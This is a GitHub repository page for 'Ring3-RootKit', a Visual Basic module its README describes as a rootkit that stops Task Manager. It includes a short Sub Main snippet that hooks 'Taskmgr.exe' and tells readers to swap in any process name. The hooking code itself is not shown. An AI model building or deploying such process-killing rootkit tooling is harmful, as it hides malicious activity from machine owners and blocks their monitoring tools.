Skip to content

bdunlap9/Ring3-RootKit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Ring3-RootKit

This is a VB module

This rootkit Stops Task Manager.

To change the process to stop edit:

Sub Main()

Console.Title = "Proccess Killer"

HookApplication("Taskmgr.exe") 'Change "Taskmgr.exe" to desired process name

Console.ReadLine()

End Sub

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published